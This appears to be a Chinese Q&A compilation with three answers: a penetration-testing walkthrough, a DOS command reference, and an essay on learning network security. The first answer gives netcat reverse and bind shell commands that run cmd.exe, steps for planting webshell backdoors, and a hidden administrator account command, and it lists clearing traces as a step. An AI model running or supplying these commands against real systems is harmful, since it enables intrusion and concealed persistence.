❶ web渗透是什么
Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况下对其渗透,相当于代码分析审计。而黑盒测试则是在对该网站系统信息不知情的情况下渗透,以下所说的Web渗透就是黑盒渗透。
Web渗透分为以下几个步骤,信息收集,漏洞扫描,漏洞利用,提权,内网渗透,留后门,清理痕迹。一般的渗透思路就是看是否有注入漏洞,然后注入得到后台管理员账号密码,登录后台,上传小马,再通过小马上传大马,提权,内网转发,进行内网渗透,扫描内网c段存活主机及开放端口,看其主机有无可利用漏洞(nessus)端口(nmap)对应服务及可能存在的漏洞,对其利用(msf)拿下内网,留下后门,清理痕迹。或者看是否有上传文件的地方,上传一句话木马,再用菜刀链接,拿到数据库并可执行cmd命令,可继续上大马.........思路很多,很多时候成不成功可能就是一个思路的问题,技术可以不高,思路一定得骚。
信息收集
信息收集是整个流程的重中之重,前期信息收集的越多,Web渗透的成功率就越高。
DNS域名信息:通过url获取其真实ip,子域名(Layer子域名爆破机),旁站(K8旁站,御剑1.5),c段,网站负责人及其信息(whois查询)
整站信息:服务器操作系统、服务器类型及版本(Apache/Nginx/Tomcat/IIS)、数据库类型(Mysql/Oracle/Accees/Mqlserver)、脚本类型(php/jsp/asp/aspx)、CMS类型;
网站常见搭配为:
ASP和ASPX:ACCESS、SQLServer
PHP:MySQL、PostgreSQL
JSP:Oracle、MySQL
敏感目录信息(御剑,dirbust)
开放端口信息(nmp)
漏洞扫描
利用AWVS,AppScan,OWASP-ZAP,等可对网站进行网站漏洞的初步扫描,看其是否有可利用漏洞。
常见漏洞:
SQL注入
XSS跨站脚本
CSRF跨站请求伪造
XXE(XML外部实体注入)漏洞
SSRF(服务端请求伪造)漏洞
文件包含漏洞
文件上传漏洞
文件解析漏洞
远程代码执行漏洞
CORS跨域资源共享漏洞
越权访问漏洞
目录遍历漏洞和任意文件读取/下载漏洞
漏洞利用
用工具也好什么也好对相应漏洞进行利用
如:
Sql注入(sqlmap)
XSS(BEEF)
后台密码爆破(burp)
端口爆破(hydra)
提权
获得shell之后我们权限可能很低,因此要对自己提权,可以根据服务器版本对应的exp进行提权,对于Windows系统也可看其补丁对应漏洞的exp进行提权
内网渗透
首先进行端口转发可用nc
nc使用方法:
反向连接
在公网主机上进行监听:
nc-lvp 4444
在内网主机上执行:
nc-e cmd.exe 公网主机ip4444
成功之后即可得到一个内网主机shell
正向连接
远程主机上执行:
nc-l -p 4444 -t -e cmd.exe
本地主机上执行:
nc-vv 远程主机ip4444
成功后,本地主机即可远程主机的一个shell
然后就是对内网进行渗透了,可以用主机漏洞扫描工具(nessus,x-scan等)进行扫描看是否有可用漏洞,可用msf进行利用,或者用nmap扫描存活主机及开放端口,可用hydra进行端口爆破或者用msf对端口对应漏洞得到shell拿下内网留后门
留后门
对于网站上传一句话木马,留下后门
对于windows用户可用hideadmin创建一个超级隐藏账户
手工:
netuser test$ 123456 /add
netlocalgroup administrators test$ /add
这样的话在cmd命令中看不到,但在控制面板可以看到,还需要改注册表才能实现控制版面也看不到,太过麻烦,不多赘述,所以还是用工具省心省力。
❷ 求所有CMD的指令
DOS命令集-回忆DOS命令集-回忆(一)MD——建立子目录 1.功能:创建新的子目录 2.类型:内部命令 3.格式:MD[盘符:][路径名]〈子目录名〉 4.使用说明: (1)“盘符”:指定要建立子目录的磁盘驱动器字母,若省略,则为当前驱动器; (2)“路径名”:要建立的子目录的上级目录名,若缺省则建在当前目录下。 例:(1)在C盘的根目录下创建名为FOX的子目录;(2)在FOX子目录下再创建USER子目录。 C:、>MD FOX (在当前驱动器C盘下创建子目录FOX) C:、>MD FOX 、USER (在FOX 子目录下再创建USER子目录) (二)CD——改变当前目录 1.功能:显示当前目录 2.类型:内部命令 3.格式:CD[盘符:][路径名][子目录名] 4.使用说明: (1)如果省略路径和子目录名则显示当前目录; (2)如采用“CD、”格式,则退回到根目录; (3)如采用“CD.。”格式则退回到上一级目录。 例:(1)进入到USER子目录;(2)从USER子目录退回到子目录;(3)返回到根目录。 C:、>CD FOX 、USER(进入FOX子目录下的USER子目录) C:、FOX、USER>CD.。 (退回上一级根目录) C:、FOX>CD、 (返回到根目录) C:、> (三)RD——删除子目录命令 1.功能:从指定的磁盘删除了目录。 2.类型:内部命令 3.格式:RD[盘符:][路径名][子目录名] 4.使用说明: (1)子目录在删除前必须是空的,也就是说需要先进入该子目录,使用DEL(删除文件的命令)将其子目录下的文件删空,然后再退回到上一级目录,用RD命令删除该了目录本身; (2)不能删除根目录和当前目录。 例:要求把C盘FOX子目录下的USER子目录删除,操作如下: 第一步:先将USER子目录下的文件删空; C、>DEL C:、FOX、USER、*。* 第二步,删除USER子目录。 C、>RD C:、FOX、USER (四)DIR——显示磁盘目录命令 1.功能:显示磁盘目录的内容。 2.类型:内部命令 3.格式:DIR [盘符][路径][/P][/W] 4. 使用说明:/P的使用;当欲查看的目录太多,无法在一屏显示完屏幕会一直往上卷,不容易看清,加上/P参数后,屏幕上会分面一次显示23行的文件信息,然后暂停,并提示;Press any key to continue /W的使用:加上/W只显示文件名,至于文件大小及建立的日期和时间则都省略。加上参数后,每行可以显示五个文件名。 PATH——路径设置命令 1.功能:设备可执行文件的搜索路径,只对文件有效。 2.类型:内部命令 3.格式:PATH[盘符1]目录[路径名1]{[;盘符2:],〈目录路径名2〉…} 4.使用说明: (1)当运行一个可执行文件时,DOS会先在当前目录中搜索该文件,若找到则运行之;若找不到该文件,则根据PATH命令所设置的路径,顺序逐条地到目录中搜索该文件; (2)PATH命令中的路径,若有两条以上,各路径之间以一个分号“;”隔开; (3)PATH命令有三种使用方法: PATH[盘符1:][路径1][盘符2:][路径2]…(设定可执行文件的搜索路径) PATH:(取消所有路径) PATH:(显示目前所设的路径) (六)TREE——显示磁盘目录结构命令 1.功能:显示指定驱动器上所有目录路径和这些目录下的所有文件名。 2.类型:外部命令 3.格式:TREE[盘符:][/F][》PRN] 4.使用说明: (1)使用/F参数时显示所有目录及目录下的所有文件,省略时,只显示目录,不显示目录下的文件; (2)选用>PRN参数时,则把所列目录及目录中的文件名打印输出。 (七)DELTREE——删除整个目录命令 1.功能:将整个目录及其下属子目录和文件删除。 2.类型:外部命令 3.格式:DELTREE[盘符:]〈路径名〉 4.使用说明:该命令可以一步就将目录及其下的所有文件、子目录、更下层的子目录一并删除,而且不管文件的属性为隐藏、系统或只读,只要该文件位于删除的目录之下,DELTREE都一视同仁,照删不误。使用时务必小心!!! 五、磁盘操作类命令 (一)formAT——磁盘格式化命令 1.功能:对磁盘进行格式化,划分磁道和扇区;同时检查出整个磁盘上有无带缺陷的磁道,对坏道加注标记;建立目录区和文件分配表,使磁盘作好接收DOS的准备。 2.类型:外部命令 3.格式:formAT〈盘符:〉[/S][/4][/Q] 4.使用说明: (1)命令后的盘符不可缺省,若对硬盘进行格式化,则会如下列提示:WARNING:ALL DATA ON NON ——REMOVABLE DISK DRIVE C:WILL BE LOST ! Proceed with format (Y/N)? (警告:所有数据在C盘上,将会丢失,确实要继续格式化吗?) (2)若是对软盘进行格式化,则会如下提示:Insert mew diskette for drive A; and press ENTER when ready… (在A驱中插入新盘,准备好后按回车键)。 (3)选用[/S]参数,将把DOS系统文件IO.SYS 、MSDOS.SYS及COMMAND.COM复制到磁盘上,使该磁盘可以做为DOS启动盘。若不选用/S参数,则格式化后的磙盘只能读写信息,而不能做为启动盘; (4)选用[/4]参数,在1.2MB的高密度软驱中格式化360KB的低密度盘; (5)选用[/Q]参数,快速格式化,这个参数并不会重新划分磁盘的磁道貌岸然和扇区,只能将磁盘根目录、文件分配表以及引导扇区清成空白,因此,格式化的速度较快。 (6)选用[/U]参数,表示无条件格式化,即破坏原来磁盘上所有数据。不加/U,则为安全格式化,这时先建立一个镜象文件保存原来的FAT表和根目录,必要时可用UNFORRMAT恢复原来的数据。 (二)UNformAT恢复格式化命令 1.功能:对进行过格式化误操作丢失数据的磁盘进行恢复。 2.类型:外部命令 3.格式:UNformAT〈盘符〉[/L][/U][/P][/TEST] 4.使用说明:用于将被“非破坏性”格式化的磁盘恢复。根目录下被删除的文件或子目录及磁盘的系统扇区(包括FAT、根目录、BOOT扇区及硬盘分区表)受损时,也可以用UNformAT来抢救。 (1)选用/L参数列出找到的子目录名称、文件名称、大孝日期等信息,但不会真的做formAT工作。 (2)选用/P参数将显示于屏幕的报告(包含/L参数所产生的信息)同时也送到打印机。运行时屏幕会显示:“Print out will be sent to LPT1” (3)选用/TEST参数只做模拟试验(TEST)不做真正的写入动作。使用此参数屏幕会显示:“Simulation only” (4)选用/U参数不使用MIRROR映像文件的数据,直接根据磁盘现状进行UNformAT。 (5)选用/PSRTN;修复硬盘分区表。 若在盘符之后加上/P、/L、/TEST之一,都相当于使用了/U参数,UNformAT会“假设”此时磁盘没有MIRROR映像文件。 注意:UNformAT对于刚formAT的磁盘,可以完全恢复,但formAT后若做了其它数据的写入,则UNformAT就不能完整的救回数据了。UNformAT并非是万能的,由于使用UNformAT会重建FAT与根目录,所以它也具有较高的危险性,操作不当可能会扩大损失,如果仅误删了几个文件或子目录,只需要利用UNDELETE就够了。 三) CHKDSK——检查磁盘当前状态命令 1.功能:显示磁盘状态、内存状态和指定路径下指定文件的不连续数目。 2.类型:外部命令 3.格式:CHKDSK [盘符:][路径][文件名][/F][/V] 4.使用说明: (1)选用[文件名]参数,则显示该文件占用磁盘的情况; (2)选[/F]参数,纠正在指定磁盘上发现的逻辑错误; (3)选用[/V]参数,显示盘上的所有文件和路径。 (四)DISKCOPY——整盘复制命令 1.功能:复制格式和内容完全相同的软盘。 2.类型:外部命令 3.格式:DISKCOPY[盘符1:][盘符2:] 4.使用说明: (1)如果目标软盘没有格式化,则复制时系统自动选进行格式化。 (2)如果目标软盘上原有文件,则复制后将全部丢失。 (3)如果是单驱动器复制,系统会提示适时更换源盘和目标盘,请操作时注意分清源盘和目标盘。 (五)LABEL——建立磁盘卷标命令 1.功能:建立、更改、删除磁盘卷标。 2.类型:外部命令 3.格式:LABEL[盘符:][卷标名] 4.使用说明: (1)卷标名为要建立的卷标名,若缺省此参数,则系统提示键入卷标名或询问是否删除原有的卷标名; (2)卷标名由1至11个字符组成。 (六)VOL——显示磁盘卷标命令 1.功能:查看磁盘卷标号。 2.类型:内部命令 3.格式:VOL[盘符:] 4.使用说明:省略盘符,显示当前驱动器卷标。 (七)SCANDISK——检测、修复磁盘命令 1.功能:检测磁盘的FAT表、目录结构、文件系统等是否有问题,并可将检测出的问题加以修复。 2.类型:外部命令 3.格式:SCANDISK[盘符1:]{[盘符2:]…}[/ALL] 4.使用说明: (1)CCANDISK适用于硬盘和软盘,可以一次指定多个磁盘或选用[/ALL]参数指定所有的磁盘; (2)可自动检测出磁盘中所发生的交*连接、丢失簇和目录结构等逻辑上的错误,并加以修复。 (八)DEFRAG——重整磁盘命令 1.。功能:整理磁盘,消除磁盘碎块。 2.类型:外部命令 3.格式:DEFRAG[盘符:][/F] 4.使用说明:选用/F参数,将文件中存在盘上的碎片消除,并调整磁盘文件的安排,确保文件之间毫无空隙。从而加快读盘速度和节省磁盘空间。 (九)SYS——系统复制命令 1.功能:将当前驱动器上的DOS系统文件IO.SYS,MSDOS.SYS和COMMAND.COM 传送到指定的驱动器上。 2.类型:外部命令 3.格式:SYS[盘符:] *使用说明:如果磁盘剩余空间不足以存放系统文件,则提示:No roomfor on destination disk. 文件操作类命令 (一) COPY文件复制命令 1.功能:拷贝一个或多个文件到指定盘上。 2.类型:内部命令 3.格式:COPY [源盘][路径]〈源文件名〉[目标盘][路径][目标文件名] 4.使用说明: (1)COPY是文件对文件的方式复制数据,复制前目标盘必须已经格式化; (2)复制过程中,目标盘上相同文件名称的旧文件会被源文件取代; (3)复制文件时,必须先确定目标般有足够的空间,否则会出现;insufficient的错误信息,提示磁盘空间不够; (4)文件名中允许使用通配举“*”“?”,可同时复制多个文件; (5)COPY命令中源文件名必须指出,不可以省略。 (6)复制时,目标文件名可以与源文件名相同,称作“同名拷贝”此时目标文件名可以省略; (7)复制时,目标文件名也可以与源文件名不相同,称作“异名拷贝”,此时,目标文件名不能省略; (8)复制时,还可以将几个文件合并为一个文件,称为“合并拷贝”,格式如下:COPY;[源盘][路径]〈源文件名1〉〈源文件名2〉…[目标盘][路径]〈目标文件名〉; (9)利用COPY命令,还可以从键盘上输入数据建立文件,格式如下:COPY CON [盘符:][路径]〈文件名〉; (10)注意:COPY命令的使用格式,源文件名与目标文件名之间必须有空格! (二)XCOPY——目录复制命令 1.功能:复制指定的目录和目录下的所有文件连同目录结构。 2.类型:外部命令 3.格式:XCOPY [源盘:]〈源路径名〉[目标盘符:][目标路径名][/S][/V][/E] 4.使用说明: (1)XCOPY是COPY的扩展,可以把指定的目录连文件和目录结构一并拷贝,但不能拷贝隐藏文件和系统文件; (2)使用时源盘符、源目标路径名、源文件名至少指定一个; (3)选用/S时对源目录下及其子目录下的所有文件进行COPY。除非指定/E参数,否则/S不会拷贝空目录,若不指定/S参数,则XCOPY只拷贝源目录本身的文件,而不涉及其下的子目录; (4)选用/V参数时,对的拷贝的扇区都进行较验,但速度会降低。 (三)TYPE——显示文件内容命令 1.功能:显示ASCII码文件的内容。 2.类型:内部命令。 3.格式:TYPE[盘符:][路径]〈文件名〉 4.使用说明: (1)显示由ASCII码组成的文本文件,对。EXE.COM等为扩展名的文件,其显示的内容是无法阅读的,没有实际意义2; (2)该命令一次只可以显示一个文件的内容,不能使用通配符; (3)如果文件有扩展名,则必须将扩展名写上; (4)当文件较长,一屏显示不下时,可以按以下格式显示;TYPE[盘符:][路径]〈文件名〉|MORE,MORE为分屏显示命令,使用些参数后当满屏时会暂停,按任意键会继续显示。 (5)若需将文件内容打印出来,可用如下格式: TYPE[盘符:][路径]〈文件名〉,>PRN 此时,打印机应处于联机状态。
❸ 如何学好网络安全
经常看到一些网友在论坛发帖问该如何学习网络安全技术,说的直接一点就是想学习黑客攻防技术,最近有网友加我qq又谈到这个问题,今天就整理一下我的一些看法,希望对大家能有所帮助。
从98年开始接触网络安全技术到现在已经10多年了,那时候的个人电脑的系统基本都是win98,服务器基本是winnt,上网都是通过猫拨号上网,记得上网一小时4.2元。攻击方法基本就是远程控制,远程蓝屏,暴力破解密码,拒绝服务攻击等,还没有出现sql注入和社工,安全书籍中的文章大多数都是对一些软件的使用方法做介绍,用的木马基本就两个,美国死牛之祭组织出的bo2000和国产的冰河。冰河我用了很长一段时间,直到现在看到7626这个数字还觉得亲切,因为这是冰河被控制端开启的端口,手工删除冰河也很简单,找到进程中的g_server.exe关闭删除就可以了。还有个破解win98共享文件夹的软件印象也比较深刻,图标是个卡通公鸡头,破解速度很快,破解原理是系统密码认证有问题,对密码的识别不是整个字符串识别的,而是一个字符一个字符的识别,破解软件就可以根据系统返回的yes、no进行尝试。
网上不少人说要学网络安全一定要会c和c++语言,我觉得完全没必要,不是说学了没用,而是在初学阶段用处不大,甚至枯燥的学习会扼杀你的兴趣,等到技术达到了一定程度再学,会事半功倍,不少从事信息安全多年的专业人士都没有写过一行代码,一样被人称为大牛。还有人说学网络安全英语一定要好,其实你只要能认识那些常用的计算机单词就行了,当然你要考cissp除外。还有人说学网络安全一定要会unix和linux,我觉得windows就够学的了,人的精力总是有限的,不可能把所有的领域都搞得很精通,与其样样通,样样松,何不做精,在某一领域有所专长。
忘记unicode漏洞是哪年被发现了,感觉很震撼,没想到通过这种方式可以控制计算机,当时有这种漏洞的服务器到处都是,原因很简单,服务器管理者对系统补丁的重要性认识不足,没有及时安装补丁。这种漏洞的利用方式简单的讲就是通过浏览器就可以对目标计算机执行cmd命令,用的最多的命令就是dir、、type,用dir浏览服务器的文件目录,看到感兴趣的文件到虚拟目录下,然后通过浏览器下载,看到文本文件用type阅读。也可以通过tftp上传文件。
还有输入法漏洞,同样的震撼,入侵者通过远程桌面连接到目标计算机上,调出输入法,通过输入法的帮助功能,执行cmd命令,尽管是老漏洞,但同样适用于目前的一些远程接入程序,学网络安全必须做到举一反三,条条大路通罗马。
印象最深刻的远程溢出漏洞是在05年,ms05039漏洞,溢出后,用nc可以直接连上某个溢出后开启的端口,获得系统的shell权限,在互联网上成功率很高,在局域网成功率基本是99%。
没头没脑说这么多,又不能混稿费,就此打住,进入正题。初学者可以在计算机上安装vm虚拟机,vm的功能很多,需要注意的就这么几个:制作恢复快照,通过Ctrl+Alt释放虚拟机中的鼠标,安装完vm后,接着安装VMwareTools 其他就不做详细介绍了。在虚拟机中安装个win2003,安装完成后,默认设置下是可以ping通本地机的,这样一个小的网络环境就搭建好了,如果硬件允许,可以同时运行多个虚拟机,用虚拟系统进行攻防测试,不会影响到真实系统。至于都做哪些攻防测试,我觉得可以先做系统漏洞攻防,下载使用各种漏洞扫描器,进行全面扫描,根据存在的漏洞,用各种方法做入侵测试,还可以试试各种溢出攻击,掌握各种常用的cmd命令。接下来可以开启系统的iis服务,在虚拟目录中放一个漏洞百出的整站系统做web漏洞攻防,sql注入、跨站、脚本入侵等,根据获得的webshell进行提权测试。还可以在系统中安装各种应用软件,对应用软件存在的漏洞进行攻防测试。喜欢看书的朋友还可以看看《黑客x档案》、《黑客手册》、《黑客防线》,网上有部分电子版,前两本相对简单写,《黑客防线》系统底层的文章相对多些。等到各种攻防测试都做完了,可以看看一些网络基础方面的书籍,你会发现之前苦涩难懂的理论知识理解起来不是那么困难了。《TCP/IP
详解》这本书不错,卷一详细描述协议栈,同样的一本书,每个阶段看,收获是完全不一样的。《欺骗的艺术》这本书也不错,网上有电子版,看完后你会发现,社会工程学原来是门艺术。当你掌握的技术越多,就越觉得不懂的更多。
黑客工具有成千上万个,这里给大家介绍几款个人感觉不错的。x-scan,国产漏洞扫描器,优点是稳定,可扩展性强,缺点是很久没更新了,漏洞库不够新;Acunetix
Web Vulnerability
Scanner,简写wvs,是款web扫描器,优点是web漏洞扫描全面,缺点是运行速度太慢;ssport,小巧的端口扫描器,优点是扫描速度快,可以在运行中调节扫描速度,号称无级变速,缺点是有漏扫情况,占用网络资源很厉害,运行后,基本不用上网了,甚至拖垮你的局域网。不少人用s扫描器,ssport的端口扫描速度不如s扫描器,但整体来说不比s扫描器差。cain,很不错的嗅探工具,功能太多了,操作稍微有点复杂,用了cain你会发现,网络中到处都是明文密码。
如果你的时间和精力充足,又想学学编程,可以考虑学学delphi,上手快,不是有这么一句话吗:聪明的程序员用delphi,学编程对全面了解操作系统有一定的帮助。
当你学会了攻,也就明白怎么防了,防比攻更难,攻是单点突破,防是系统工程。网上不少人在收徒弟,这其中不少人是骗子,前不久看过一个所谓的黑客教学视频,制作者通过一个不带任何参数的ping命令+web扫描,只是web扫描,就击垮了一个SF服务器,看完后我也被他击垮了。最好的老师永远是你自己,只要有兴趣,多动手实践,多思考,一定会有所收获。路在何方?路永远在你脚下。最后还要说一句,不要去黑别人,因为中国有句老话:善有善报,恶有恶报。更不要以为做了几次跳板别人就找不到你了。
转载仅供参考,版权属于原作者